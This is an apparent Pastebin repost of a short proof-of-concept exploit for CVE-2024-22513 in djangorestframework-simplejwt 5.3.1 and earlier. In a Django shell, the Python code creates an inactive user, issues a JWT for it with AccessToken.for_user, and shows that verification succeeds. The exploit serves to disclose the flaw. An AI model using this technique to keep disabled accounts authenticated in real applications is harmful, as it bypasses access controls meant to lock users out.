Advertisement
FlyFar

djangorestframework-simplejwt 5.3.1 - Information Disclosure - CVE-2024-22513

Apr 18th, 2024
623
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.87 KB | Cybersecurity | 0 0
  1. # Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure
  2. # Date: 26/01/2024
  3. # Exploit Author: Dhrumil Mistry (dmdhrumilmistry)
  4. # Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/
  5. # Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1
  6. # Version: <= 5.3.1
  7. # Tested on: MacOS
  8. # CVE : CVE-2024-22513
  9.  
  10. # The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.
  11. # This vulnerability has the potential to cause various security issues,
  12. # including Business Object Level Authorization (BOLA), Business Function
  13. # Level Authorization (BFLA), Information Disclosure, etc. The vulnerability
  14. # arises from the fact that a user can access web application resources even
  15. # after their account has been disabled, primarily due to the absence of proper
  16. # user validation checks.
  17.  
  18. # If a programmer generates a JWT token for an inactive user using
  19. `AccessToken`
  20. # class and `for_user` method then a JWT token is returned which can
  21. be used for
  22. # authentication across the django and django rest framework application.
  23.  
  24. # Start Django Shell using below command:
  25. # python manage.py shell
  26. # ----------------------------------------
  27.  
  28. # Create inactive user and generate token for the user
  29. from django.contrib.auth.models import User
  30. from rest_framework_simplejwt.tokens import AccessToken
  31.  
  32. # create inactive user
  33. inactive_user_id = User.objects.create_user('testuser',
  34. 'test@example.com', 'testPassw0rd!', is_active=False).id
  35.  
  36. # django application programmer generates token for the inactive user
  37. AccessToken.for_user(User.objects.get(id=inactive_user_id))  # error
  38. should be raised since user is inactive
  39.  
  40. # django application verifying user token
  41. AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() #
  42. no exception is raised during verification of inactive user token
  43.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement